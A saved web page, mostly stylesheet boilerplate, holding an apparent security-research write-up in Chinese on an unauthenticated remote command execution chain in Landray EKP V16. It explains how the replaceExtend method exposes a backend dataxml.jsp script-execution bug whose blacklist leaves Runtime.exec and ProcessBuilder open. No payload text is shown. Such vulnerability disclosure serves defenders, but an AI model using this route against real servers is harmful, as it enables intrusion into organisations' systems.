Penetration_Testing_POC/books/某凌 EKP 前台远程命令执行漏洞分析.html


<!DOCTYPE html> <html lang=en style><!--
Page saved with SingleFile
url: https://xz.aliyun.com/t/15006
--><meta charset=utf-8>
<title>某凌 EKP 前台远程命令执行漏洞分析</title>
<meta name=description content=先知社区,先知安全技术社区>
<meta name=viewport content="width=device-width,initial-scale=1.0,minimum-scale=1.0,maximum-scale=1.0,user-scalable=no">
<style>/*!
* Bootstrap v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}footer{display:block}html{font-size:100%;-webkit-text-size-adjust:100%;-ms-text-size-adjust:100%}a:focus{outline:thin dotted #333;outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}a:hover,a:active{outline:0}img{height:auto;vertical-align:middle;-ms-interpolation-mode:bicubic}input{margin:0}button{-webkit-appearance:button}body{margin:0;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;font-size:14px;line-height:20px;color:#333}a{text-decoration:none}a:hover,a:focus{color:#005580;text-decoration:underline}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}.container{width:940px}.span10{width:780px}.container{margin-right:auto;margin-left:auto}.container:before,.container:after{display:table;line-height:0;content:""}.container:after{clear:both}p{margin:0 0 10px}strong{font-weight:bold}.text-right{text-align:right}.text-center{text-align:center}h1,h2,h4{margin:10px 0;font-family:inherit;font-weight:bold;line-height:20px;color:inherit;text-rendering:optimizelegibility}h4{font-size:17.5px}ul{padding:0}hr{margin:20px 0;border:0;border-top:1px solid #eee;border-bottom:1px solid #fff}blockquote p{font-size:17.5px;font-weight:300;line-height:1.25}q:before,q:after,blockquote:before,blockquote:after{content:""}code,pre{color:#333;-webkit-border-radius:3px;-moz-border-radius:3px}code{color:#d14;white-space:nowrap;border:1px solid #e1e1e8}pre{display:block;margin:0 0 10px;word-break:break-all;white-space:pre-wrap;border:1px solid rgba(0,0,0,0.15);-webkit-border-radius:4px;-moz-border-radius:4px}pre code{color:inherit}input{font-weight:normal}input{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif}input[type="text"]{display:inline-block;padding:4px 
6px;margin-bottom:10px;font-size:14px;line-height:20px;vertical-align:middle;-webkit-border-radius:4px;-moz-border-radius:4px}input{width:206px}input[type="text"]{background-color:#fff;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075);-webkit-transition:border linear .2s,box-shadow linear .2s;-moz-transition:border linear .2s,box-shadow linear .2s;-o-transition:border linear .2s,box-shadow linear .2s;transition:border linear .2s,box-shadow linear .2s}textarea:focus,input[type="text"]:focus,input[type="password"]:focus,input[type="datetime"]:focus,input[type="datetime-local"]:focus,input[type="date"]:focus,input[type="month"]:focus,input[type="time"]:focus,input[type="week"]:focus,input[type="number"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="search"]:focus,input[type="tel"]:focus,input[type="color"]:focus,.uneditable-input:focus{border-color:rgba(82,168,236,0.8);outline:0;outline:thin dotted \9;-webkit-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);-moz-box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6);box-shadow:inset 0 1px 1px rgba(0,0,0,0.075),0 0 8px rgba(82,168,236,0.6)}input::-webkit-input-placeholder,textarea::-webkit-input-placeholder{color:#999}input{margin-left:0}input:focus:invalid,textarea:focus:invalid,select:focus:invalid{color:#b94a48;border-color:#ee5f5b}input:focus:invalid:focus,textarea:focus:invalid:focus,select:focus:invalid:focus{border-color:#e9322d;-webkit-box-shadow:0 0 6px #f8b9b7;-moz-box-shadow:0 0 6px #f8b9b7;box-shadow:0 0 6px #f8b9b7}.fade{opacity:0;-webkit-transition:opacity .15s linear;-moz-transition:opacity .15s linear;-o-transition:opacity .15s linear}.collapse{position:relative;-webkit-transition:height .35s ease;-moz-transition:height .35s ease;-o-transition:height .35s ease;transition:height .35s ease}.btn{text-shadow:0 1px 1px 
rgba(255,255,255,0.75);vertical-align:middle;background-image:-moz-linear-gradient(top,#fff,#e6e6e6);background-image:-webkit-gradient(linear,0 0,0 100%,from(#fff),to(#e6e6e6));background-image:-webkit-linear-gradient(top,#fff,#e6e6e6);background-image:-o-linear-gradient(top,#fff,#e6e6e6);background-r
<style>/*! Editor.md v1.5.0 | editormd.min.css | Open source online markdown editor. | MIT License | By: Pandao | https://github.com/pandao/editor.md | 2015-06-09 *//*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:FontAwesome;src:url(data:font/woff2;base64,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
<style>/*!
* Bootstrap Responsive v2.3.1
*
* Copyright 2012 Twitter, Inc
* Licensed under the Apache License v2.0
* http://www.apache.org/licenses/LICENSE-2.0
*
* Designed and built with all the love in the world @twitter by @mdo and @fat.
*/.clearfix:before,.clearfix:after{display:table;line-height:0;content:""}.clearfix:after{clear:both}@-ms-viewport{width:device-width}@media(min-width:768px) and (max-width:979px){}@media(max-width:767px){}@media(min-width:1200px){.row{margin-left:-30px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:30px}.container{width:1170px}.span10{width:970px}input{margin-left:0}}@media(min-width:768px) and (max-width:979px){.row{margin-left:-20px}.row:before,.row:after{display:table;line-height:0;content:""}.row:after{clear:both}[class*="span"]{float:left;min-height:1px;margin-left:20px}.container{width:724px}.span10{width:600px}input{margin-left:0}}@media(max-width:767px){body{padding-right:0px;padding-left:0px}.container{width:auto}.row{margin-left:0}[class*="span"]{display:block;float:none;width:100%;margin-left:0;-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}.modal{position:fixed;right:20px;left:20px;width:auto;margin:0}.modal.fade{top:-100px}}@media(max-width:480px){.nav-collapse{-webkit-transform:translate3d(0,0,0)}.modal{top:10px;right:10px;left:10px}}@media(max-width:979px){body{padding-top:0}.navbar .container{width:auto;padding:0}.navbar .brand{padding-right:10px;padding-left:10px}.nav-collapse{clear:both}.nav-collapse.collapse{height:0;overflow:hidden}}@media(min-width:980px){.nav-collapse.collapse{height:auto !important;overflow:visible !important}}</style>
<style>li{line-height:26px}a:hover{text-decoration:none}.post-user-action>span{margin-right:10px;line-height:21px;border:0}.post-user-action .i-seprator{color:rgba(0,0,0,0.1);margin:0 2px}.navbar .brand{padding:0;height:50px;margin-left:0;display:inline-block !important;background-repeat:no-repeat;width:120px;background-size:207px 50px;background-image:url(data:image/svg+xml;base64,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)}.brand-box{position:absolute}.related-section{min-height:42px;padding:5px 0;margin-top:25px;border-top:1px solid #eee}.related-section>.related-
<style>a{color:#778087}.topic-list p{margin:0}.topic-content{min-height:40px}.collapse form{position:relative;width:300px;float:right}div.search{padding:10px 0}.d1 input{height:20px;padding-left:18px;border:1px solid #ddd;border-radius:15px;outline:0;background:#fff;color:#9e9c9c;float:right}.vote{font-weight:normal;margin-left:6px}.topic-list{word-break:break-all;word-wrap:break-word}ul{margin:0 0 10px 0}/*!*border-bottom: solid #eee 1px;*!*/.thumbs{margin-right:10px;color:#778087}.thumbs i{line-height:20px;cursor:pointer;margin-right:5px}.manual-box{height:1.7rem;line-height:1.7rem;text-align:right}.manual-box>span{margin-left:.7rem}.user-info{padding:5px 0 5px 0}.post-content{padding:10px 0 0 0}.reply-jump{color:#6c6c6c;cursor:pointer;margin-right:5px}.reply-jump:hover{color:#ccc}.topic-info a,.topic-info{padding-top:5px}.topic-info a:hover{text-decoration:solid}.reminder{min-height:200px;border:1px #ddd solid;border-radius:3px;line-height:200px;text-align:center}</style>
<style>body{background-color:#eee}form{margin:0 !important}a:focus{text-decoration:none}.markdown-body p>code{white-space:normal;word-break:break-all;border:none !important}.box ul,ol{margin-bottom:0px !important}.markdown-body ul{list-style-type:disc}.markdown-body ul{margin:0 0 24px 0 !important}.box a:hover{text-decoration:none}.box-container>ul>li{list-style-type:none}#Wrapper .row.box{margin-left:0px}.navbar-inner{border-radius:0px;min-height:40px;padding-right:0px;padding-left:0px;outline:0;margin-bottom:0;list-style:none;z-index:1050;background:#fff;-webkit-box-shadow:0 1px 4px rgba(0,21,41,0.08);box-shadow:0 1px 4px rgba(0,21,41,0.08);line-height:46px;-webkit-transition:background .3s,width .2s;-o-transition:background .3s,width .2s;transition:background .3s,width .2s}.bs-docs-footer{text-align:left;color:#99979c;height:64px;background-color:#FFF;border-top:1px solid rgba(0,0,0,0.22);line-height:64px}.bs-docs-footer .links>a{display:inline-block;padding:0 12px;border-left:1px solid #e8e8e8;color:#8c8c8c;line-height:1}.bs-docs-footer .links>a:first-child{border-left:0}.box-container .user-info{margin-bottom:10px;background:#fff}.content-title{font-size:24px;color:#333;text-decoration:none;line-height:24px;text-shadow:0 1px 0#fff}.markdown-body h1,.markdown-body h2{border-bottom:0}.box-container{padding:20px}.breadcrumb{padding:8px 10px 8px 15px;margin-bottom:10px;border-radius:0;color:#000;background-color:#fff}.breadcrumb>li{text-shadow:none !important;margin:2px 0px}.active{text-shadow:none !important}.breadcrumb .active{color:#555;display:inline-block;text-shadow:none !important}.label{background-color:#f4f4f4;font-size:12px;line-height:12px;display:inline-block;padding:4px 4px 4px 4px;-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;text-decoration:none;color:#666;text-shadow:none;font-weight:normal}.topic-info{color:#999 !important;font-size:12px !important}.topic-info a{padding:0px;color:#555 !important;font-size:12px 
!important}.topic-info a:hover{color:#4d5256;text-decoration:underline}.post-info a:hover{color:#666 !important}.user-info .post-info span,.topic-info .cell{padding-left:0 !important;margin-left:0px;font-size:10px;font-weight:bold}.markdown-body img{max-width:90% !important;text-align:center;margin-left:auto;margin-right:auto;display:block;padding:10px 0px 10px 0px}.user-info .post-info span,.topic-info span{margin-left:0px;font-size:10px;color:rgba(0,0,0,0.45)}.avatar{-webkit-box-sizing:border-box;box-sizing:border-box;border:#999 1px solid;border-radius:4px;padding:1px;margin:1.5px 10px 0px 0px;display:inline-block;text-align:center;vertical-align:middle;background:#fff;width:44px;height:44px;max-width:100%;-ms-interpolation-mode:bicubic}.btn{display:inline-block;padding:4px 12px;margin-bottom:0;font-size:14px;line-height:20px;background-color:#f4f4f4;color:#444;border-color:#ddd;font-family:"Helvetica Neue For Number",-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"PingFang SC","Hiragino Sans GB","Microsoft YaHei","Helvetica Neue",Helvetica,Arial,sans-serif;-webkit-box-sizing:border-box;box-sizing:border-box;margin:0;list-style:none;font-weight:400;text-align:center;cursor:pointer;background-image:none;white-space:nowrap;border-radius:2px;height:32px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none}.box{font-family:Monospaced Number,Chinese Quote,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif;font-size:14px;line-height:1.5;color:rgba(0,0,0,0.65);-webkit-box-sizing:border-box;box-sizing:border-box;margin-top:0 !important;margin-bottom:20px;padding:0;list-style:none;background:#fff;border-radius:2px;position:relative;-webkit-transition:all .3s;-o-transition:all .3s;transition:all .3s;-moz-box-shadow:0 1px 1px rgba(0,0,0,0.15);-webkit-box-shadow:0 1px 1px rgba(143,168,191,.35);box-shadow:0 1px 1px rgba(143,168,191,.35);border-bottom:1px solid 
#e2e2e9}.span10{float:left;min-height:1px}#Wrapper .span10{margin-left:0px !important;max-width:960px}@media(min-width:1200px
<style>/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:"FontAwesome";src:url(data:font/woff2;base64,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
<style>.highlight .c{color:#8f5902;font-style:italic}.highlight .k{color:#204a87;font-weight:bold}.highlight .l{color:#000}.highlight .n{color:#000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .p{color:#000;font-weight:bold}.highlight .cm{color:#8f5902;font-style:italic}.highlight .cp{color:#8f5902;font-style:italic}.highlight .c1{color:#8f5902;font-style:italic}.highlight .kc{color:#204a87;font-weight:bold}.highlight .kd{color:#204a87;font-weight:bold}.highlight .kr{color:#204a87;font-weight:bold}.highlight .kt{color:#204a87;font-weight:bold}.highlight .m{color:#0000cf;font-weight:bold}.highlight .s{color:#4e9a06}.highlight .na{color:#c4a000}.highlight .nb{color:#204a87}.highlight .nf{color:#000}.highlight .nn{color:#000}.highlight .nx{color:#000}.highlight .nt{color:#204a87;font-weight:bold}.highlight .mi{color:#0000cf;font-weight:bold}.highlight .s2{color:#4e9a06}.highlight .s1{color:#4e9a06}</style>
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media(max-width:800px){}</style>
<!--[if lte IE 8]>
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
<![endif]-->
<!--[if !IE]> -->
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style>@media(pointer:coarse){@media only screen and (max-device-width:1024px){}@media only screen and (max-device-width:414px){}@media only screen and (max-device-width:320px){}}</style><style>@media screen and (max-width:768px){}</style><style>/*!
* Waves v0.7.5
* http://fian.my.id/Waves
*
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
* Released under the MIT license
* https://github.com/fians/Waves/blob/master/LICENSE
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes 
sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes 
swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
<body>
<div id=Wrapper class=container>
<div class=row2>
<div class=span10>
<div class="row box content" width="1200px !important" style=width:1200px>
<div class=box-container>
<div class=main-topic>
<div class="clearfix user-info topic-list">
<p><span class=content-title>某凌 EKP 前台远程命令执行漏洞分析</span>
</p>
<div class=topic-info>
<span class=info-left>
<a href=https://xz.aliyun.com/u/56506>
<span class="username cell"> Le1a</span></a> <span class=i-seprator> / </span>
<span> 2024-07-08 18:57:39</span><span class=i-seprator> / </span>
<span>发表于四川 / </span>
<span>浏览数 666</span>
<span class=content-node>
<span class="label label-default label-node-first">
<a href=https://xz.aliyun.com/tab/1>技术文章</a></span>
<span class="label label-default">
<a href=https://xz.aliyun.com/node/11>技术文章</a></span>
</span>
</span>
</div>
</div>
<hr>
<div id=topic_content class="topic-content markdown-body">
<p>作者:Le1a@微步漏洞团队</p>
<h1 id=toc-0>漏洞描述</h1>
<p>某凌 EKP 由深圳市某凌软件股份有限公司开发,是一款面向中小企业的移动化智能办公产品。</p>
<p>该系统存在远程命令执行漏洞,攻击者能够借助 <code>sysUiComponent</code> 接口的 <code>replaceExtend</code> 方法,把原本需要登录后台才能触发的 <code>dataxml.jsp</code> 命令执行漏洞,转化为无需登录即可触发的前台命令执行漏洞。</p>
<h1 id=toc-1>影响版本</h1>
<pre><code>version = V16</code></pre>
<h1 id=toc-2>漏洞分析</h1>
<h2 id=toc-3>前置漏洞</h2>
<p>该漏洞属于后台 dataxml.jsp 远程命令执行的前台绕过版本,接下来先介绍一下此后台漏洞的原理。</p>
<p><a id=img0 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185418-6ceea6da-3d18-1.png><img src="data:image/png;base64,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
<p>在此处执行了 <code>treeBean</code> 的 <code>getDataList</code> 方法,并传入了请求的参数。而 <code>SysFormulaSimulateByJS</code> 类继承了 <code>IXMLDataBean</code>,其 <code>getDataList</code> 方法如下:</p>
<p><a id=img1 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185434-764c0380-3d18-1.png><img src=data:image/png;base64,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
<p>通过 <code>FormulaParser#parseValueScript()</code> 执行了传入的 script 脚本。尽管禁用了 unicode 并设置了一些黑名单,但未禁用 <code>Runtime.exec</code> 和 <code>ProcessBuilder</code>,所以仍然能够执行命令。这也说明,对脚本执行入口仅做黑名单过滤并不可靠。</p>
<p><a id=img2 href=https://xzfile.aliyuncs.com/media/upload/picture/20240708185449-7f4d144c-3d18-1.png><img src=data:image/png;base64,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
<p>这种利用 bsh 的打法还有许多接口可用,在此不逐一举例,更多详情见:<a href=https://github.com/ax1sX/SecurityList/blob/main/Java_OA/LandrayEkpAudit.md target=_blank>LandrayEkpAudit</a></p>
